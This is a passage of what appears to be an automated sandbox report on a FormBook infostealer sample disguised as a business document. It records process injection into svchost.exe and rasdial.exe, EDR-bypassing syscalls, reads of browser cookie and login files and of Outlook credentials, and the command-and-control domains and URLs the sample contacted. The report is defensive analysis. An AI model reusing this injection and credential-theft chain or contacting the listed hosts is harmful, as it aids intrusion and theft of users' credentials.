            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\rasdial.exeThread register set: target process: 7400Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2CE4008Jump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E48C93 LogonUserW,0_2_00E48C93
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DF3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DF3B4C
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DF4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00DF4A35
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E54EF5 mouse_event,0_2_00E54EF5
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"Jump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E481F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E481F7
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E54C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00E54C03
            Source: 20-EM-00- PI-INQ-3001.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: 20-EM-00- PI-INQ-3001.exe, eVmdoPPWSZoVOB.exe, 00000005.00000000.1923199176.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000002.3531391111.00000000014E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000000.1923199176.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000002.3531391111.00000000014E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000000.1923199176.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000002.3531391111.00000000014E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000000.1923199176.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000002.3531391111.00000000014E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1886B cpuid 0_2_00E1886B
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E250D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00E250D7
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E32230 GetUserNameW,0_2_00E32230
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E2418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00E2418A
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DF4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DF4AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: 20-EM-00- PI-INQ-3001.exeBinary or memory string: WIN_81
            Source: 20-EM-00- PI-INQ-3001.exeBinary or memory string: WIN_XP
            Source: 20-EM-00- PI-INQ-3001.exeBinary or memory string: WIN_XPe
            Source: 20-EM-00- PI-INQ-3001.exeBinary or memory string: WIN_VISTA
            Source: 20-EM-00- PI-INQ-3001.exeBinary or memory string: WIN_7
            Source: 20-EM-00- PI-INQ-3001.exeBinary or memory string: WIN_8
            Source: 20-EM-00- PI-INQ-3001.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E66596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00E66596
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E66A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00E66A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1503379 Sample: 20-EM-00- PI-INQ-3001.exe Startdate: 03/09/2024 Architecture: WINDOWS Score: 100 31 www.jaxo.xyz 2->31 33 www.weep.site 2->33 35 12 other IPs or domains 2->35 39 Malicious sample detected (through community Yara rule) 2->39 41 Antivirus detection for URL or domain 2->41 43 Multi AV Scanner detection for submitted file 2->43 47 5 other signatures 2->47 10 20-EM-00- PI-INQ-3001.exe 4 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 31->45 process4 signatures5 57 Binary is likely a compiled AutoIt script file 10->57 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 13 svchost.exe 10->13         started        process6 signatures7 63 Maps a DLL or memory area into another process 13->63 16 eVmdoPPWSZoVOB.exe 13->16 injected process8 dnsIp9 25 www.jaxo.xyz 66.29.149.180, 49754, 49755, 49756 ADVANTAGECOMUS United States 16->25 27 www.xforum.tech 103.224.182.242, 49758, 49759, 49760 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 16->27 29 8 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 rasdial.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            20-EM-00- PI-INQ-3001.exe30%ReversingLabs
            20-EM-00- PI-INQ-3001.exe28%VirustotalBrowse
            20-EM-00- PI-INQ-3001.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://api.w.org/0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.weep.site/v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28100%Avira URL Cloudmalware
            http://www.onlytradez.club/zctj/?r8=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&VZ=qzwLUJ3Xbb280%Avira URL Cloudsafe
            https://tilda.cc0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.40%Avira URL Cloudsafe
            http://www.anaidittrich.com/qpwk/0%Avira URL Cloudsafe
            http://www.cannulafactory.top/l90v/0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/?VZ=qzwLUJ3Xbb28&r8=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=0%Avira URL Cloudsafe
            https://mgmasistencia.com/acerca-de/0%Avira URL Cloudsafe
            https://mgmasistencia.com/0%Avira URL Cloudsafe
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.40%Avira URL Cloudsafe
            http://www.xforum.tech/647x/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.40%Avira URL Cloudsafe
            https://es.wordpress.org/0%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/0%Avira URL Cloudsafe
            https://twitter.com/wordpress0%Avira URL Cloudsafe
            http://www.ayypromo.shop/rgqx/0%Avira URL Cloudsafe
            https://mgmasistencia.com/blog/0%Avira URL Cloudsafe
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.onlytradez.club/zctj/0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/0%Avira URL Cloudsafe
            http://www.ayypromo.shop/rgqx/?r8=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&VZ=qzwLUJ3Xbb280%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.40%Avira URL Cloudsafe
            https://mgmasistencia.com/comments/feed/0%Avira URL Cloudsafe
            http://www.cannulafactory.top/l90v/?r8=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&VZ=qzwLUJ3Xbb280%Avira URL Cloudsafe
            http://www.anaidittrich.com0%Avira URL Cloudsafe
            https://mgmasistencia.com/wp-json/0%Avira URL Cloudsafe
            http://www.88nn.pro/l4rw/?r8=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&VZ=qzwLUJ3Xbb280%Avira URL Cloudsafe
            http://www.88nn.pro/l4rw/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg0%Avira URL Cloudsafe
            http://www.jaxo.xyz/f9bc/0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=0%Avira URL Cloudsafe
            https://mgmasistencia.com/contacto/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.40%Avira URL Cloudsafe
            http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox540%Avira URL Cloudsafe
            https://mgmasistencia.com/feed/0%Avira URL Cloudsafe
            http://www.redhat.com/docs/manuals/enterprise/0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/0%Avira URL Cloudsafe
            https://wordpress.org/0%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-10%Avira URL Cloudsafe
            http://www.redhat.com/0%Avira URL Cloudsafe
            https://mgmasistencia.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/?r8=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&VZ=qzwLUJ3Xbb280%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.ayypromo.shop
            		176.57.64.102
            		truefalse
              		unknown
              fontanerourgente.net
              		37.187.158.211
              		truefalse
                		unknown
                www.jaxo.xyz
                		66.29.149.180
                		truetrue
                  		unknown
                  weep.site
                  		194.233.65.154
                  		truefalse
                    		unknown
                    32wxd.top
                    		206.119.82.116
                    		truefalse
                      		unknown
                      www.cannulafactory.top
                      		18.183.3.45
                      		truefalse
                        		unknown
                        www.anaidittrich.com
                        		162.55.254.209
                        		truefalse
                          		unknown
                          www.onlytradez.club
                          		167.172.133.32
                          		truefalse
                            		unknown
                            www.88nn.pro
                            		45.157.69.194
                            		truefalse
                              		unknown
                              www.xforum.tech
                              		103.224.182.242
                              		truefalse
                                		unknown
                                www.weep.site
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.taapbit.online
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.fontanerourgente.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.32wxd.top
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.32wxd.top/kyiu/?VZ=qzwLUJ3Xbb28&r8=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.anaidittrich.com/qpwk/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.onlytradez.club/zctj/?r8=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&VZ=qzwLUJ3Xbb28false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.weep.site/v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28false
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.cannulafactory.top/l90v/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.ayypromo.shop/rgqx/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.xforum.tech/647x/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.onlytradez.club/zctj/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.cannulafactory.top/l90v/?r8=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&VZ=qzwLUJ3Xbb28false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.ayypromo.shop/rgqx/?r8=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&VZ=qzwLUJ3Xbb28false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.32wxd.top/kyiu/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.88nn.pro/l4rw/?r8=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&VZ=qzwLUJ3Xbb28false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.88nn.pro/l4rw/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jaxo.xyz/f9bc/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontanerourgente.net/t3gh/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontanerourgente.net/t3gh/?r8=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&VZ=qzwLUJ3Xbb28false
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/chrome_newtabrasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
